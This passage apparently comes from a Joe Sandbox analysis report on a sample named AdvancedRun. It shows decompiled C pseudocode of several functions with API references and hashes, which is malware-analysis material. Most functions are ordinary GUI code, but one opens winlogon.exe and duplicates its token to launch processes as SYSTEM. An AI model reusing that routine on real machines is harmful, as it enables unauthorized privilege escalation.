                                                                  0x0040ae8f
                                                                  0x0040ae0c
                                                                  0x0040ae10
                                                                  0x0040ae1e
                                                                  0x0040ae3b
                                                                  0x0040ae4a
                                                                  0x0040ae65
                                                                  0x0040ae7a
                                                                  0x0040ae7e
                                                                  0x0040ae67
                                                                  0x0040ae67
                                                                  0x0040ae68
                                                                  0x00000000
                                                                  0x0040ae68
                                                                  0x0040ae4c
                                                                  0x0040ae4c
                                                                  0x0040ae4e
                                                                  0x00000000
                                                                  0x0040ae4e
                                                                  0x0040ae3d
                                                                  0x0040ae3d
                                                                  0x0040ae3f
                                                                  0x0040ae53
                                                                  0x0040ae54
                                                                  0x0040ae59
                                                                  0x0040ae5c
                                                                  0x0040ae5c
                                                                  0x0040ae20
                                                                  0x0040ae28
                                                                  0x0040ae2d
                                                                  0x0040ae30
                                                                  0x0040ae30
                                                                  0x0040ae12
                                                                  0x0040ae12
                                                                  0x0040ae13
                                                                  0x00000000
                                                                  0x0040ae13
                                                                  0x00000000
                                                                  0x0040ae10

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                  • API String ID: 3510742995-3273207271
                                                                  • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                  • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                  0x004041f9
                                                                  0x00404205
                                                                  0x00404208
                                                                  0x00404217
                                                                  0x0040421e
                                                                  0x00404236
                                                                  0x0040423f
                                                                  0x0040424a
                                                                  0x0040425f
                                                                  0x0040426b
                                                                  0x0040426e
                                                                  0x0040426e
                                                                  0x00404275
                                                                  0x004043be
                                                                  0x004043ce
                                                                  0x004043d0
                                                                  0x004043d3
                                                                  0x004043da
                                                                  0x004043da
                                                                  0x004043c0
                                                                  0x004043c3
                                                                  0x004043c3
                                                                  0x0040427b
                                                                  0x0040428c
                                                                  0x0040428f
                                                                  0x00404295
                                                                  0x004042a5
                                                                  0x004042b8
                                                                  0x004042cb
                                                                  0x004042de
                                                                  0x004042f1
                                                                  0x00404304
                                                                  0x00404317
                                                                  0x0040432a
                                                                  0x0040433d
                                                                  0x00404350
                                                                  0x00404363
                                                                  0x00404376
                                                                  0x00404389
                                                                  0x0040439c
                                                                  0x004043a4
                                                                  0x004043af
                                                                  0x004043b5
                                                                  0x004043b5
                                                                  0x004043f5

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040421E
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                  • DragFinish.SHELL32(?), ref: 0040423F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                  • BeginDeferWindowPos.USER32(0000000D), ref: 0040427D
                                                                  • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                  • String ID: $
                                                                  • API String ID: 2142561256-3993045852
                                                                  • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                  • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 55%
                                                                  			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                  0x00405b81
                                                                  0x00405b88
                                                                  0x00405b8a
                                                                  0x00405b8a
                                                                  0x00405b8f
                                                                  0x00405b96
                                                                  0x00405b9b
                                                                  0x00405bad
                                                                  0x00405bad
                                                                  0x00405b9d
                                                                  0x00405b9d
                                                                  0x00405ba8
                                                                  0x00405bab
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405bab
                                                                  0x00405be9
                                                                  0x00405be9
                                                                  0x00405baf
                                                                  0x00405bb1
                                                                  0x00405ce2
                                                                  0x00405ce2
                                                                  0x00405bb7
                                                                  0x00405bbd
                                                                  0x00405bf6
                                                                  0x00405c4b
                                                                  0x00405c4c
                                                                  0x00405c52
                                                                  0x00405c53
                                                                  0x00000000
                                                                  0x00405bf8
                                                                  0x00405c02
                                                                  0x00405c0e
                                                                  0x00405c13
                                                                  0x00405c18
                                                                  0x00405c2c
                                                                  0x00405c2e
                                                                  0x00405c3b
                                                                  0x00405c3c
                                                                  0x00405c42
                                                                  0x00000000
                                                                  0x00405c1a
                                                                  0x00405c25
                                                                  0x00405c2a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405c2a
                                                                  0x00405c18
                                                                  0x00405bbf
                                                                  0x00405bc0
                                                                  0x00405bcd
                                                                  0x00405bce
                                                                  0x00405bd7
                                                                  0x00405c58
                                                                  0x00405c5f
                                                                  0x00405c61
                                                                  0x00405c61
                                                                  0x00405c63
                                                                  0x00405cdb
                                                                  0x00405cdb
                                                                  0x00405c65
                                                                  0x00405c65
                                                                  0x00405c74
                                                                  0x00000000
                                                                  0x00405c84
                                                                  0x00405c8a
                                                                  0x00405c8d
                                                                  0x00405c99
                                                                  0x00405caf
                                                                  0x00405cbd
                                                                  0x00405cc8
                                                                  0x00405cd4
                                                                  0x00405cd9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405cd9
                                                                  0x00405c74
                                                                  0x00405c63
                                                                  0x00405ce6

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                  • wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                    • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                  • wcslen.MSVCRT ref: 00405C20
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                  • memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                  • String ID: strings
                                                                  • API String ID: 3166385802-3030018805
                                                                  • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                  • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                  0x00401e59
                                                                  0x00401e5c
                                                                  0x00401e64
                                                                  0x00401e67
                                                                  0x00401ef9
                                                                  0x00401e6d
                                                                  0x00401e70
                                                                  0x00401e76
                                                                  0x00401e79
                                                                  0x00401e7e
                                                                  0x00401e83
                                                                  0x00401e92
                                                                  0x00401e85
                                                                  0x00401e8e
                                                                  0x00401e8e
                                                                  0x00401e96
                                                                  0x00401ee6
                                                                  0x00401e98
                                                                  0x00401e9b
                                                                  0x00401e9e
                                                                  0x00401ea3
                                                                  0x00401ea8
                                                                  0x00401ebb
                                                                  0x00401eaa
                                                                  0x00401eb7
                                                                  0x00401eb7
                                                                  0x00401ebf
                                                                  0x00401ed3
                                                                  0x00401ec1
                                                                  0x00401ec7
                                                                  0x00401ec9
                                                                  0x00401ec9
                                                                  0x00401ed8
                                                                  0x00401ed8
                                                                  0x00401eeb
                                                                  0x00401eeb
                                                                  0x00401f01

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                  • String ID: winlogon.exe
                                                                  • API String ID: 1315556178-961692650
                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 79%
                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                  0x00405241
                                                                  0x00405250
                                                                  0x00405257
                                                                  0x0040525f
                                                                  0x00405262
                                                                  0x00405265
                                                                  0x00405268
                                                                  0x0040526f
                                                                  0x0040526f
                                                                  0x00405277
                                                                  0x00405277
                                                                  0x0040527a
                                                                  0x0040527f
                                                                  0x00405284
                                                                  0x00405285
                                                                  0x00405291
                                                                  0x00405296
                                                                  0x004052a9
                                                                  0x004052b3
                                                                  0x004052b7
                                                                  0x004052bc
                                                                  0x004052ca
                                                                  0x004052d2
                                                                  0x004052d5
                                                                  0x004052d8
                                                                  0x004052d8
                                                                  0x004052db
                                                                  0x004052db
                                                                  0x004052e1
                                                                  0x004052e4
                                                                  0x004052e8
                                                                  0x004052f2

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                  • String ID: %s (%s)
                                                                  • API String ID: 3979103747-1363028141
                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                  0x00406157
                                                                  0x0040616d
                                                                  0x00406174
                                                                  0x0040617f
                                                                  0x00406185
                                                                  0x00406196
                                                                  0x0040619e
                                                                  0x004061b6
                                                                  0x004061bd
                                                                  0x004061d4
                                                                  0x004061da
                                                                  0x004061e0
                                                                  0x004061e5
                                                                  0x004061e6
                                                                  0x004061ef
                                                                  0x004061f9
                                                                  0x004061ff
                                                                  0x004061ef
                                                                  0x00406206

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                  • String ID: sysdatetimepick32
                                                                  • API String ID: 1028950076-4169760276
                                                                  • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                  • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                  0x00404706
                                                                  0x00404714
                                                                  0x0040471c
                                                                  0x00404721
                                                                  0x0040472b
                                                                  0x00404733
                                                                  0x00404735
                                                                  0x00404735
                                                                  0x00404733
                                                                  0x00404751
                                                                  0x00404780
                                                                  0x00404753
                                                                  0x0040475e
                                                                  0x00404766
                                                                  0x0040476c
                                                                  0x00404770
                                                                  0x00404770
                                                                  0x0040478a

                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                  • wcslen.MSVCRT ref: 00404756
                                                                  • wcscpy.MSVCRT ref: 00404766
                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                  • wcscpy.MSVCRT ref: 00404780
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                  • String ID: netmsg.dll
                                                                  • API String ID: 2767993716-3706735626
                                                                  • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                  • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
